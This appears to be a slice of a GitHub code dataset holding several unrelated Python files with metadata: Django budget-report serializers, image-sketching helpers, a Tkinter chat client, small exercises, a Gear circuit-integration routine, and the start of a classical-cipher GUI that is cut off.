DDOWiseAllocationReportSerializer(serializers.ModelSerializer):\n short_code_mapping = serializers.CharField(source=\"short_code_mapping.short_codes\")\n short_code_mapping_id = serializers.CharField(source=\"short_code_mapping.public_id\")\n ddo_master_code = serializers.CharField(source=\"ddo_master.code\")\n ddo_master_code_id = serializers.CharField(source=\"ddo_master.public_id\")\n ddo_master_description = serializers.CharField(source=\"ddo_master.description\")\n allocation_detail = serializers.SerializerMethodField(\"get_allocation_detail\")\n grant_number = serializers.SerializerMethodField(\"get_grant_number\")\n\n class Meta:\n model = DDOWiseAllocations\n fields = (\n \"short_code_mapping\",\n \"short_code_mapping_id\",\n \"ddo_master_code_id\",\n \"ddo_master_code\",\n \"ddo_master_description\",\n \"grant_number\",\n \"allocation_detail\",\n )\n\n @staticmethod\n def get_allocation_detail(inst):\n return AllocationsDetailSerializer(\n AllocationsDetail.objects.filter(ddo_wise_allocation=inst), many=True\n ).data\n\n @staticmethod\n def get_grant_number(inst):\n return inst.short_code_mapping.budget_on_short_code.filter().last().grant.number\n\n\nclass LCAmountVariationRemarkSerializer(serializers.ModelSerializer):\n \"\"\"\n This serializer is used to list of all variation code and detail.\n \"\"\"\n\n class Meta:\n model = LCAmountVariationRemark\n fields = (\"amount\", \"remark\", \"percent_variation\")\n\n\nclass DetailLCSerializer(serializers.ModelSerializer):\n \"\"\"\n This serializer is used to get list of all variation code.\n \"\"\"\n\n lc_date = serializers.DateField(format=\"%d-%m-%Y\")\n\n class Meta:\n model = LCDetail\n fields = [\"lc_number\", \"lc_date\", \"lc_from_period\", \"lc_to_period\"]\n\n\nclass MileStoneScrollSerializer(serializers.ModelSerializer):\n \"\"\"\n This serializer is used to list of all variation code.\n \"\"\"\n\n scroll_date = serializers.DateTimeField(source=\"date\", format=\"%d-%m-%Y\")\n credit_by_detail = serializers.CharField(\n source=\"credit_by.function_head\", required=False\n )\n\n class Meta:\n model = MileStoneScroll\n fields = (\"amount\", \"description\", \"scroll_date\", \"credit_by_detail\")\n\n\nclass MileStoneSerializer(serializers.ModelSerializer):\n \"\"\"\n This serializer is used to list of all variation code.\n \"\"\"\n\n milestone_date = serializers.DateTimeField(source=\"date\", format=\"%d-%m-%Y\")\n\n scroll_detail = serializers.SerializerMethodField(\"get_scroll_detail\")\n\n class Meta:\n model = MileStone\n fields = (\"amount\", \"description\", \"milestone_date\", \"scroll_detail\")\n\n @staticmethod\n def get_scroll_detail(inst):\n return MileStoneScrollSerializer(\n inst.scroll_on_milestone.filter(), many=True\n ).data\n\n\nclass AccountSerializer(serializers.ModelSerializer):\n \"\"\"\n This serializer is used to list of all variation code.\n \"\"\"\n\n function_head = serializers.CharField(\n source=\"short_code_mapping.functional_head_matrix.function_head_master.function_head\"\n )\n object_code = serializers.CharField(\n source=\"short_code_mapping.functional_head_matrix.objects_heads.description\"\n )\n sub_code = serializers.CharField(\n source=\"short_code_mapping.functional_head_matrix.sub_head.description\",\n required=False,\n )\n category_description = serializers.CharField(\n source=\"short_code_mapping.functional_head_matrix.category_master.description\"\n )\n short_codes = serializers.CharField(source=\"short_code_mapping.short_codes\")\n\n class Meta:\n model = DDOWiseAllocations\n fields = (\n \"function_head\",\n \"object_code\",\n \"sub_code\",\n \"short_codes\",\n \"category_description\",\n )\n\n\nclass AuthorizationBudgetLCSerializer(serializers.ModelSerializer):\n \"\"\"\n This serializer is used to list of all lc auth register detail for budget.\n \"\"\"\n\n letter_date = serializers.DateField(source=\"date\", format=\"%d-%m-%Y\")\n ddo_code = serializers.CharField(source=\"ddo_master.code\")\n ddo_description = serializers.CharField(source=\"ddo_master.code\")\n bank_code = serializers.CharField(source=\"bank.bank_code\")\n bank_type = serializers.CharField(source=\"bank.bank_type\")\n branch_code = serializers.CharField(source=\"branch.code\")\n branch_description = serializers.CharField(source=\"branch.branch_description\")\n # account_detail = serializers.SerializerMethodField(\"get_account_detail\")\n lcDetail = serializers.SerializerMethodField(\"get_lc_detail\")\n lcAmountVariationRemark = serializers.SerializerMethodField(\n \"get_amount_variation_remark\"\n )\n mile_stone_detail = serializers.SerializerMethodField(\"get_mile_stone\")\n\n class Meta:\n model = LCAuthorizationRequest\n fields = (\n \"ddo_code\",\n \"ddo_description\",\n \"auth_letter_no\",\n \"letter_date\",\n \"bank_code\",\n \"bank_type\",\n \"branch_code\",\n \"branch_description\",\n \"lc_type\",\n # \"account_detail\",\n \"lcDetail\",\n \"lcAmountVariationRemark\",\n \"mile_stone_detail\",\n )\n\n @staticmethod\n def get_account_detail(inst):\n return AccountSerializer(inst.ddo_wise_allocation).data\n\n @staticmethod\n def get_lc_detail(inst):\n return DetailLCSerializer(\n inst.lc_detail_on_lc_auth_request.filter().last()\n ).data\n\n @staticmethod\n def get_amount_variation_remark(inst):\n return LCAmountVariationRemarkSerializer(\n inst.lc_amount_variation_on_lc_auth_request.filter().last(),\n ).data\n\n @staticmethod\n def get_mile_stone(inst):\n return MileStoneSerializer(\n inst.lc_detail_on_lc_auth_request.get().milestone_on_lc_detail.filter(),\n many=True,\n ).data\n\n\nclass PaoLevelBudgetAllocationSerializer(serializers.ModelSerializer):\n \"\"\"\n This serializer is used to provide budget allocation on PAO level.\n \"\"\"\n\n pao_id = serializers.IntegerField(source=\"pao.public_id\")\n pao_code = serializers.CharField(source=\"pao.code\")\n pao_description = serializers.CharField(source=\"pao.description\")\n grant_id = serializers.IntegerField(source=\"grant.public_id\")\n grant_number = serializers.CharField(source=\"grant.number\")\n grant_description = serializers.CharField(source=\"grant.description\")\n allocation = serializers.SerializerMethodField(\"get_allocation\")\n\n class Meta:\n model = PaoBudget\n fields = (\n \"pao_id\",\n \"pao_code\",\n \"pao_description\",\n \"grant_id\",\n \"grant_number\",\n \"grant_description\",\n \"allocation\",\n \"financial_year\",\n )\n\n @staticmethod\n def get_allocation(inst):\n data = inst.allocation_on_pao_budget.all()\n return BudgetAllocationDetailSerializer(\n (\n data.filter(budget_type__istartswith=\"BE\").last(),\n data.filter(budget_type__istartswith=\"RE\").last(),\n data.filter(budget_type__istartswith=\"FE\").last(),\n ),\n many=True,\n ).data\n\n\nclass DDOWiseBudgetAllocationAndBalanceParams(serializers.Serializer):\n \"\"\"\n This serializer is created to validate expenditure detail on ddo for the month.\n \"\"\"\n\n financial_year = serializers.CharField()\n ddo_id = serializers.IntegerField(required=False)\n grant_master_id = serializers.IntegerField()\n start_date = serializers.DateField(required=False)\n end_date = serializers.DateField(required=False)\n\n\nclass SubHeadMasterDetailsSerializers(serializers.ModelSerializer):\n\n budget_allocation_detail = serializers.SerializerMethodField(\n \"get_budget_allocation\"\n )\n\n class Meta:\n model = SubHead\n fields = (\"description\", \"budget_allocation_detail\")\n\n def get_budget_allocation(self, inst):\n params = self.context\n ddo = params.get(\"ddo_id\")\n short_code_mapping = ShortCodeMapping.objects.filter(\n functional_head_matrix__sub_head=inst\n )\n if short_code_mapping:\n short_code_mapping_id = short_code_mapping.last().public_id\n else:\n return {\"Message\": \"Short_Code_Not_Exists\"}\n if ddo:\n return head_wise_ddo_wise_budget_allocation_and_balance(\n ddo, short_code_mapping_id, params\n )\n else:\n return get_object_head_allocation_detail(short_code_mapping_id)\n\n\nclass ObjectHeadMasterDetailSerializers(serializers.ModelSerializer):\n object_head_code = serializers.CharField(source=\"object_code\")\n object_head_description = serializers.CharField(source=\"description\")\n category = serializers.CharField(\n source=\"matrix_on_object_head__category_master__code\"\n )\n budget_allocation_detail = serializers.SerializerMethodField(\"get_sub_head_detail\")\n\n class Meta:\n model = ObjectHeadMaster\n fields = (\n \"object_head_code\",\n \"object_head_description\",\n \"category\",\n \"budget_allocation_detail\",\n )\n\n def get_sub_head_detail(self, inst):\n params = self.context\n function_head = params.get(\"function_head_inst\")\n ddo = params.get(\"ddo_id\")\n short_code_mapping = get_short_code(inst, function_head)\n if short_code_mapping:\n short_code_mapping_id = short_code_mapping.last().public_id\n else:\n return {\"Message\": \"Short_Code_Not_Exists\"}\n sub__head_inst = get_sub_head(inst)\n if ddo:\n if sub__head_inst:\n return SubHeadMasterDetailsSerializers(\n sub__head_inst, context=params, many=True\n ).data\n else:\n return head_wise_ddo_wise_budget_allocation_and_balance(\n ddo, short_code_mapping_id, params\n )\n else:\n if sub__head_inst:\n return SubHeadMasterDetailsSerializers(\n sub__head_inst, context=params, many=True\n ).data\n return get_object_head_allocation_detail(short_code_mapping_id)\n # data.append({\"object_head\": \"True\"})\n # return data\n\n\nclass FunctionalHeadMasterDetailSerializers(serializers.ModelSerializer):\n\n detail_code = serializers.CharField(source=\"detail.code\")\n detail_description = serializers.CharField(source=\"detail.description\")\n object_head_detail = serializers.SerializerMethodField(\"get_object_head_detail\")\n\n class Meta:\n model = FunctionalHeadMaster\n fields = (\"detail_code\", \"detail_description\", \"object_head_detail\")\n\n def get_object_head_detail(self, inst):\n params = self.context\n params[\"function_head_inst\"] = inst\n return ObjectHeadMasterDetailSerializers(\n get_object_head(inst), many=True, context=params,\n ).data\n\n\nclass TransferBudgetDDOWiseParams(serializers.ModelSerializer):\n \"\"\"\n This serializer is used to validate transfer budget by ddo wise.\n \"\"\"\n\n financial_year = serializers.CharField()\n start_date = serializers.DateField()\n end_date = serializers.DateField()\n\n class Meta:\n model = TransferBudget\n fields = (\"financial_year\", \"start_date\", \"end_date\")\n\n\nclass TransferBudgetDDOWiseSerializer(serializers.ModelSerializer):\n \"\"\"\n This serializer is used to validate transfer budget ddo wise.\n \"\"\"\n\n from_allocation_short_code = serializers.CharField(\n source=\"from_allocation.short_code_mapping.short_codes\"\n )\n from_allocation_ddo_code = serializers.CharField(\n source=\"from_allocation.ddo_master.code\"\n )\n from_allocation_ddo_description = serializers.CharField(\n source=\"from_allocation.ddo_master.description\"\n )\n to_allocation_short_code = serializers.CharField(\n source=\"to_allocation.short_code_mapping.short_codes\"\n )\n to_allocation_ddo_code = serializers.CharField(\n source=\"to_allocation.ddo_master.code\"\n )\n to_allocation_ddo_description = serializers.CharField(\n source=\"to_allocation.ddo_master.description\"\n )\n date = serializers.DateTimeField(source=\"created_at\", format=\"%d-%m-%Y\")\n\n class Meta:\n model = TransferBudget\n fields = (\n \"date\",\n \"from_allocation_short_code\",\n \"from_allocation_ddo_code\",\n \"from_allocation_ddo_description\",\n \"to_allocation_short_code\",\n \"to_allocation_ddo_code\",\n \"to_allocation_ddo_description\",\n \"amount\",\n )\n\n\n# LC Serializer\nclass LcStatusParams(serializers.ModelSerializer):\n lc_date = serializers.CharField(source=\"date\")\n user_type = serializers.CharField(source=\"lc_status_on_lc_auth_request__user_type\")\n status = serializers.CharField(source=\"lc_status_on_lc_auth_request__status\")\n auth_letter_no = serializers.CharField(source=\"public_id\")\n ddo_id = serializers.CharField(source=\"ddo_master__public_id\")\n ddo_description = serializers.CharField(source=\"ddo_master__description\")\n\n class Meta:\n model = LCAuthorizationRequest\n fields = (\n \"auth_letter_no\",\n \"lc_date\",\n \"ddo_id\",\n \"ddo_description\",\n \"user_type\",\n \"status\",\n )\n\n\nclass LCStatusSerializer(serializers.ModelSerializer):\n class Meta:\n model = LcAuthRequestStatus\n fields = (\n \"user_type\",\n \"status\",\n )\n\n\nclass LcStatusReportSerializer(serializers.ModelSerializer):\n lc_date = serializers.CharField(source=\"date\")\n ddo_code = serializers.CharField(source=\"ddo_master.code\")\n ddo_description = serializers.CharField(source=\"ddo_master.description\")\n short_code = serializers.CharField(source=\"short_code.short_codes\")\n lc_status = serializers.SerializerMethodField(\"get_lc_status\")\n\n class Meta:\n model = LCAuthorizationRequest\n fields = (\n \"auth_letter_no\",\n \"lc_date\",\n \"ddo_code\",\n \"ddo_description\",\n \"short_code\",\n \"lc_date\",\n \"lc_status\",\n )\n\n @staticmethod\n def get_lc_status(inst):\n return LCStatusSerializer(\n LcAuthRequestStatus.objects.filter(\n lc_auth_request__public_id=inst.public_id\n ),\n many=True,\n ).data\n\n\nclass LcUpdateReportParams(serializers.ModelSerializer):\n auth_letter_no = serializers.IntegerField(\n source=\"lc_authorization_request__public_id\"\n )\n lc_number = serializers.IntegerField(source=\"public_id\")\n\n class Meta:\n model = LCDetail\n fields = (\n \"auth_letter_no\",\n \"lc_number\",\n \"lc_date\",\n )\n\n\nclass LcUpdateReportSerializer(serializers.ModelSerializer):\n auth_letter_no = serializers.CharField(\n source=\"lc_authorization_request.auth_letter_no\"\n )\n lc_type = serializers.CharField(source=\"lc_authorization_request.lc_type\")\n ddo_code = serializers.CharField(source=\"lc_authorization_request.ddo_master.code\")\n ddo_description = serializers.CharField(\n source=\"lc_authorization_request.ddo_master.description\"\n )\n short_code = serializers.CharField(\n source=\"lc_authorization_request.short_code.short_codes\"\n )\n\n class Meta:\n model = LCDetail\n fields = (\n \"auth_letter_no\",\n \"lc_number\",\n \"lc_date\",\n \"lc_from_period\",\n \"lc_to_period\",\n \"lc_type\",\n \"ddo_code\",\n \"ddo_description\",\n \"short_code\",\n )\n\n\n# class LcMiletoneScrollParams(serializers.ModelSerializer):\n# auth_letter_no = serializers.IntegerField(source=\"lc_detail__lc_authorization_request__public_id\")\n# lc_number = serializers.IntegerField(source=\"lc_detail__lc__public_id\")\n# lc_date = serializers.DateField(source=\"lc_detail__lc_date\")\n#\n# class Meta:\n# model = MileStone\n# fields = (\n# \"auth_letter_no\",\n# \"lc_number\",\n# \"lc_date\",\n# )\n\n\nclass ScrollSerializer(serializers.ModelSerializer):\n date = serializers.DateTimeField(format=\"%d-%m-%Y\")\n\n class Meta:\n model = MileStoneScroll\n fields = (\"description\", \"amount\", \"date\")\n\n\nclass LcMiletoneSerializer(serializers.ModelSerializer):\n scroll_details = serializers.SerializerMethodField(\"get_scroll_details\")\n\n class Meta:\n model = MileStone\n fields = (\"description\", \"amount\", \"date\", \"scroll_details\")\n\n @staticmethod\n def get_scroll_details(inst):\n return ScrollSerializer(\n MileStoneScroll.objects.filter(milestone=inst), many=True\n ).data\n\n\nclass LcMiletoneScrollSerializer(serializers.ModelSerializer):\n auth_letter_no = serializers.CharField(\n source=\"lc_authorization_request.auth_letter_no\"\n )\n mile_stone_details = serializers.SerializerMethodField(\"get_mile_stone_details\")\n\n class Meta:\n model = LCDetail\n fields = (\"auth_letter_no\", \"lc_number\", \"lc_date\", \"mile_stone_details\")\n\n @staticmethod\n def get_mile_stone_details(inst):\n return LcMiletoneSerializer(\n MileStone.objects.filter(lc_detail=inst), many=True\n ).data\n","repo_name":"pythonsvelte/pythonsvelte","sub_path":"reports/budget/serializer.py","file_name":"serializer.py","file_ext":"py","file_size_in_byte":46972,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"67"} +{"seq_id":"9461006140","text":"import numpy as np\r\nimport PIL\r\nimport math\r\nfrom regex import R\r\n#Converto in immagine bianco e nero\r\n\r\ndef RGB_TO_GRAY(Image):\r\n width = Image.shape[0]\r\n height = Image.shape[1]\r\n gray_image = np.zeros((Image.shape[0],Image.shape[1]))\r\n \r\n for x in range(0,width):\r\n for y in range(0,height):\r\n gray_image[x,y] = 0.299 * Image[x,y,0] + 0.587 * Image[x,y,1] + 0.114 * Image[x,y,2]\r\n \r\n gray_image = np.floor(gray_image)\r\n \r\n return gray_image \r\n\r\n#Resitituisce l'Immagine invertita di quella in scala di grigi \r\n\r\ndef Invert_Image(gray_image):\r\n width = gray_image.shape[0]\r\n height = gray_image.shape[1]\r\n inverted_image = np.zeros((gray_image.shape[0],gray_image.shape[1]))\r\n \r\n for x in range(0,width):\r\n for y in range(0,height):\r\n inverted_image[x,y] = 255 - gray_image[x,y]\r\n \r\n inverted_image = np.floor(inverted_image)\r\n \r\n return inverted_image\r\n\r\n\r\ndef clamped_pixel(Image,x,y,c):\r\n x = math.floor(x)\r\n y = math.floor(y)\r\n c = math.floor(c)\r\n if (x < 0):\r\n x = 0\r\n if (x >= Image.shape[0]):\r\n x = Image.shape[0] - 1\r\n if (y < 0):\r\n y = 0\r\n if (y >= Image.shape[1]):\r\n y = Image.shape[1] - 1\r\n if (c < 0):\r\n c = 0\r\n if (c >= Image.shape[2]):\r\n c = Image.shape[2] - 1 \r\n return int(Image[x,y,c])\r\n\r\ndef clamped_pixel_gray(Image,x,y):\r\n x = int(x)\r\n y = int(y)\r\n if (x < 0):\r\n x = 0\r\n if (x >= Image.shape[0]):\r\n x = Image.shape[0] - 1\r\n if (y < 0):\r\n y = 0\r\n if (y >= Image.shape[1]):\r\n y = Image.shape[1] - 1\r\n return Image[x,y]\r\n\r\n\r\n\r\ndef compute_gaussian(x,y,sigma):\r\n sigma2 = sigma*sigma\r\n return 1.0/(2*np.pi*sigma2)*np.exp(-(x*x+y*y)/(2*sigma2))\r\n\r\n\r\ndef l1_normalize(Image):\r\n somma = 0\r\n for i in range(0,Image.shape[0]):\r\n for j in range(0,Image.shape[1]):\r\n somma = somma + Image[i,j]\r\n for i in range(0,Image.shape[0]):\r\n for j in range(0,Image.shape[1]):\r\n Image[i,j] = Image[i,j] / somma\r\n return\r\n\r\n#Funzione che crea un filtro gaussiano\r\n\r\ndef Create_Gaussian_Filter(sigma):\r\n Range = int(sigma*3)\r\n size = Range * 2 + 1\r\n \r\n \r\n Filter = np.zeros((size,size))\r\n for l in range(0,size):\r\n for m in range(0,size):\r\n Filter[l,m] = compute_gaussian(l - Range, m - Range, sigma)\r\n \r\n l1_normalize(Filter)\r\n return Filter\r\n \r\n#Effettua convoluzione per immagini in gray scale\r\n\r\ndef convolve_gray_image(Image,Filter):\r\n filter_offset = math.floor(Filter.shape[0] / 2)\r\n Ret_Image = np.zeros(Image.shape)\r\n\r\n #Per ogni pixel dell'immagine\r\n for i in range(0,Image.shape[0]):\r\n for j in range(0,Image.shape[1]):\r\n somma = 0\r\n for l in range(-filter_offset,filter_offset+1):\r\n for m in range(-filter_offset,filter_offset+1):\r\n a = clamped_pixel_gray(Image, i-l, j-m)\r\n b = Filter[filter_offset-l,filter_offset-m]\r\n somma = somma + (a * b)\r\n Ret_Image[i,j] = somma\r\n return Ret_Image\r\n\r\n\r\ndef convolve_image_2(image,filter):\r\n\r\n retImage = np.zeros(image.shape) #Creo array da restituire in output\r\n \r\n filterSize = filter.shape[0] #Dimensione del filtro\r\n print(filterSize)\r\n filterOffset = math.floor(filterSize/2) #Dimensione metà filtro escluso il centro\r\n print(filterOffset)\r\n \r\n imageWithPadding = np.zeros((image.shape[0] + filterSize - 1, image.shape[1] + filterSize - 1)) #Aggiungo padding all'immagine dato in input per poter utilizzare il filtro sui pixel del bordo\r\n imageWithPadding[filterOffset:-filterOffset, filterOffset:-filterOffset] = image\r\n\r\n # Per ogni pixel dell'immagine\r\n for x in range(image.shape[1]):\r\n for y in range(image.shape[0]):\r\n #Effettuo il prodotto elemento per elemento delle 2 matrici e poi sommo tutti gli elementi della matrice\r\n retImage[y, x] = (filter * imageWithPadding[y: y+filterSize, x: x+filterSize]).sum()\r\n return retImage\r\n\r\n\r\n#Funzione che effetua la divisione dei valori dei pixel tra 2 immagini \r\n\r\ndef Image_Division(Image1,Image2,scale):\r\n Final_Image = np.zeros((Image1.shape[0],Image1.shape[1]))\r\n for x in range(0,Image1.shape[0]):\r\n for y in range(0,Image1.shape[1]):\r\n if Image2[x,y] == 0:\r\n Final_Image[x,y] = Image1[x,y] * 255 / (Image2[x,y] + 1)\r\n else:\r\n Final_Image[x,y] = Image1[x,y] * 255 / Image2[x,y]\r\n return Final_Image\r\n\r\n\r\n \r\n# 12 = FILTER.SHAPE[0] - 1 \r\n\r\n# 6 = FILTER.SHAPE[0] / 2\r\n\r\n# 13 = FILTER.SHAPE[0]\r\n\r\n\r\n \r\n \r\n \r\n ","repo_name":"IvanNic06/Photo-Sketching","sub_path":"Function/SingleCore/Process_Image.py","file_name":"Process_Image.py","file_ext":"py","file_size_in_byte":4766,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"16263929992","text":"num = []\naux = 0\nwhile len(num) != 3 or num[0] == num[1] or num[1] == num[2]: # 3 different values\n for i in range(3):\n num.append(int(input(\"enter value:\")))\n\nwhile num[1] > num[0] or num[2] > num[1]: # until values are arranged correctly\n if num[2] > num[1]: # arrangement of 2 and 1\n aux = num[2]\n num[2] = num[1]\n num[1] = aux\n if num[1] > num[0]: # 1 and 0\n aux = num[0]\n num[0] = num[1]\n num[1] = aux\n\nprint(num[0], \"is the greater number and\", num[2], \"the lower\")\n","repo_name":"rubengr16/Pythonic","sub_path":"array3greaterLower.py","file_name":"array3greaterLower.py","file_ext":"py","file_size_in_byte":534,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"7367814919","text":"#### implement gui, use scroll and others from tkinter\n#### combine chat and chatbox into one file.\n\nimport chat_server\nimport tkinter as tk\nimport time\n\nclass gui:\n\n def __init__(self, da_connection):\n self.connection = da_connection\n \n self.mainbox = tk.Tk()\n self.mainbox.geometry(\"500x500\")\n self.mainbox.title(\"Abrupt Cow Chat\")\n\n # text viewing window\n self.viewer = tk.Text(self.mainbox, height=2, width=30)\n self.viewer.place( x=10 , y=10 , width=430 , height=400 )\n\n # scrollbar object\n self.scroller = tk.Scrollbar( self.mainbox )\n self.scroller.place( x=455 , y=10 , width=25 , height=400 )\n\n\n # entry box to input messages.\n self.message_box = tk.Entry()\n self.message_box.place( x=10 , y=430 , width=360 , height=30 )\n \n # button for sending messages\n self.sender = tk.Button( self.mainbox , text=\"Send Message\" )\n self.sender.place( x=380 , y=430 , width=100 )\n \n \n # syncs the scrollbar with the text window.\n self.scroller.config( command=self.viewer.yview )\n self.viewer.config( yscrollcommand=self.scroller.set )\n\n \n\n # binds keyboard shortcuts to send messsage.\n self.mainbox.bind('' , self.get_message_to_send)\n self.sender.bind('' , self.get_message_to_send)\n self.queue = ''\n \n self.message = ''\n \n while True:\n self.mainbox.update()\n self.u()\n \n\n\n def get_message_to_send(self,event):\n\n s = self.message_box.get()\n if s != '':\n self.message_box.delete(0, tk.END)\n \n self.connection.send(s)\n \n return\n\n\n\n def u(self):\n k = self.connection.receive()\n if k != 'E O F: EOF':\n \n k = k.encode(encoding='utf-8')\n self.viewer.delete('1.0', tk.END)\n \n self.viewer.insert(tk.END , k)\n self.viewer.insert(tk.END , '\\n')\n self.viewer.yview_moveto( 1 )\n\n\n","repo_name":"Bloxore/Hack-UCI-2019","sub_path":"chat_gui.py","file_name":"chat_gui.py","file_ext":"py","file_size_in_byte":2111,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"408798369","text":"\"\"\" 207 IF\r\nif ... elif\r\nPF - 20.07.2021 v5\r\n\"\"\" #\r\n\r\n# pylint: disable=invalid-name\r\n# pylint: disable=pointless-string-statement\r\n\r\n\r\nfrom random import randint\r\n\r\nnota = randint(1, 11)\r\n\r\nif nota == 10:\r\n print('foarte bine')\r\nelif nota == 5:\r\n print('am trecut si de data asta!')\r\n\r\ninput('Apasa pt a iesi')\r\n","repo_name":"oprea1991/PythonInfoAcademyCourse","sub_path":"Cap2_07_if_elif.py","file_name":"Cap2_07_if_elif.py","file_ext":"py","file_size_in_byte":328,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"10295293356","text":"from __future__ import (unicode_literals, absolute_import,\n division, print_function)\n\nimport numpy as np\nimport sys\n\nfrom scipy.misc import factorial\n\nfrom . import printing\n\norder = None\n# FAST = True\n\n\ndef is_implicit():\n return True\n\n\ndef has_ff():\n return True\n\n\ndef get_required_values():\n \"\"\"This returns two python arrays built this way:\n [ max_order_of_x, max_order_of_dx ]\n Where:\n Both the values are int, or None\n if max_order_of_x is set to k, the df method needs all the x(n-i) values of x,\n where i<=k (the value the function assumed i+1 steps before the one we will ask for the derivative).\n The same applies to max_order_of_dx, but regards dx(n)/dt\n None means that NO value is required.\n\n The first array has to be used if no prediction is required, the second are the values needed for prediction.\n \"\"\"\n # notice that: it returns the same values, it should be order-1 if no prediction is required BUT\n # we build the required values in a (hopefully) fast way, that requires\n # one point more.\n return ((order, None), (order, None))\n\n\ndef get_df(pv_array, suggested_step, predict=False):\n \"\"\"The array must be built in this way:\n It has to be an array of arrays. Each of them has the following structure:\n\n [time, np_matrix, np_matrix]\n\n Hence the pv_array[k] element is made of:\n _ time is the time in which the solution is valid: t(n-k)\n _ The first np_matrix is x(n-k)\n _ The second is d(x(n-k))/dt\n Values that are not needed may be set to None and they will be disregarded.\n\n if predict == True, it needs one more point to give a prediction\n of x at the suggested step.\n\n Returns: None if the incorrect values were given, or quits.\n Otherwise returns an array:\n _ the [0] element is the np matrix of coeffiecients (Nx1) of x(n+1)\n _ the [1] element is the np matrix of constant terms (Nx1) of x(n+1)\n The derivative may be written as:\n d(x(n+1))/dt = ret[0]*x(n+1) + ret[1]\"\"\"\n\n if order is None:\n printing.print_general_error(\n \"You must set Gear's order before using it! e.g. gear.order = 5\")\n sys.exit(1)\n\n s = []\n s.append(0)\n for index in range(1, order + 2):\n s.append(suggested_step + pv_array[0][0] - pv_array[index - 1][0])\n\n # build e[k, i]\n e = np.zeros((order + 2, order + 2))\n for k_index in range(1, order + 2):\n for i_index in range(1, order + 2):\n if i_index == k_index:\n e[k_index, i_index] = 1\n else:\n e[k_index, i_index] = s[i_index] / (s[i_index] - s[k_index])\n\n alpha = np.zeros((1, order + 2))\n for k_index in range(1, order + 2):\n alpha[0, k_index] = 1.0\n for j_index in range(order + 1):\n alpha[0, k_index] = alpha[0, k_index] * e[k_index, j_index + 1]\n\n # build gamma\n gamma = np.zeros((1, order + 1))\n for k_index in range(1, order + 1):\n gamma[0, k_index] = alpha[0, k_index] * \\\n ((1.0 / s[order + 1]) - (1.0 / s[k_index]))\n\n gamma[0, 0] = 0\n for index in range(1, order + 1):\n gamma[0, 0] = gamma[0, 0] - gamma[0, index]\n\n # values to be returned\n C1 = gamma[0, 0]\n\n C0 = np.zeros(pv_array[0][1].shape)\n for index in range(order):\n C0 = C0 + gamma[0, index + 1] * pv_array[index][1]\n\n x_lte_coeff = 0\n for k_index in range(1, order + 1):\n x_lte_coeff = x_lte_coeff + \\\n (s[k_index] ** (order + 1)) * \\\n (-1.0 * gamma[0, k_index] / gamma[0, 0])\n x_lte_coeff = ((-1.0) ** (order + 1)) * \\\n (1.0/factorial(order + 1)) * x_lte_coeff\n\n if predict:\n predict_x = np.zeros(pv_array[0][1].shape)\n for index in range(1, order + 2): # order\n predict_x = predict_x + alpha[0, index] * pv_array[index - 1][1]\n\n predict_lte_coeff = -1.0/factorial(order + 1)\n for index in range(1, order + 2):\n predict_lte_coeff = predict_lte_coeff * s[index]\n # print predict_lte_coeff\n # print x_lte_coeff\n else:\n predict_x = None\n predict_lte_coeff = None\n\n return C1, C0, x_lte_coeff, predict_x, predict_lte_coeff\n","repo_name":"ahkab/ahkab","sub_path":"ahkab/gear.py","file_name":"gear.py","file_ext":"py","file_size_in_byte":4193,"program_lang":"python","lang":"en","doc_type":"code","stars":336,"dataset":"github-code","pt":"67"} +{"seq_id":"74070025493","text":"from Controller import ShiftController\nfrom Controller import SubstitutionController\nfrom Controller import AffineController\nfrom Controller import VigenereController\nfrom Controller import HillController\nfrom Controller import PermutationController\nfrom Controller import DESController\nfrom Controller import AESController\nfrom Model import DAO\nfrom tkinter import *\nfrom tkinter import messagebox\nfrom tkinter import ttk\nfrom tkinter import filedialog\nimport math\nimport random\nimport numpy as np\n\n\nclass View:\n def __init__(self):\n self.main = Tk()\n self.main.title(\"Multi-encryptor\")\n self.icon = PhotoImage(file=\"Image/shield.png\")\n self.main.iconphoto(False, self.icon)\n self.main.attributes(\"-topmost\", True)\n self.main.resizable(False, False)\n\n self.TextLabel = Label(self.main, text=\"Bản rõ:\", font=(\"Arial\", \"12\"))\n self.TextField = Text(self.main, borderwidth=2, relief=\"ridge\", width=60, height=10)\n self.TextScrollbar = Scrollbar(self.main, command=self.TextField.yview, orient=VERTICAL)\n self.TextField['yscrollcommand'] = self.TextScrollbar.set\n\n self.CryptLabel = Label(self.main, text=\"Bản mã:\", font=(\"Arial\", \"12\"))\n self.CryptField = Text(self.main, borderwidth=2, relief=\"ridge\", width=60, height=10, state=\"disabled\")\n self.CryptScrollbar = Scrollbar(self.main, command=self.CryptField.yview, orient=VERTICAL)\n self.CryptField['yscrollcommand'] = self.CryptScrollbar.set\n\n self.CipherOptionLabel = Label(self.main, text=\"Hệ mã hóa\", font=(\"Arial\", \"14\", \"bold\"))\n self.option = [\"Shift Cipher\", \"Substitution Cipher\", \"Affine Cipher\",\n \"Vigenère Cipher\", \"Hill Cipher\", \"Permutation Cipher\",\n \"DES\", \"AES 128\", \"AES 192\", \"AES 256\"]\n self.CipherOption = ttk.Combobox(self.main, values=self.option, state='readonly')\n self.CipherOption.current(0)\n\n self.KLabel = Label(self.main, text=\"Khóa k:\", font=(\"Arial\", \"12\"))\n self.KField = Entry(self.main, font=(\"Arial\", \"12\"))\n\n self.var = IntVar()\n self.var.set(0)\n self.DefaultRadioButton = Radiobutton(self.main, text=\"Mặc định\", variable=self.var, value=0)\n self.FileRadioButton = Radiobutton(self.main, text=\"Chọn file\", variable=self.var, value=1)\n\n self.EncryptButton = ttk.Button(self.main, text=\"Encrypt\", command=self.EncryptButtonClick)\n self.DecryptButton = ttk.Button(self.main, text=\"Decrypt\", command=self.DecryptButtonClick)\n\n self.TextLabel.grid(column=0, row=0, sticky=W)\n self.TextField.grid(column=0, row=1, columnspan=2, rowspan=2)\n self.TextScrollbar.grid(column=2, row=1, rowspan=2, sticky=W + N + S)\n\n self.CryptLabel.grid(column=0, row=3, sticky=W)\n self.CryptField.grid(column=0, row=4, columnspan=2, rowspan=3)\n self.CryptScrollbar.grid(column=2, row=4, rowspan=3, sticky=W + N + S)\n\n 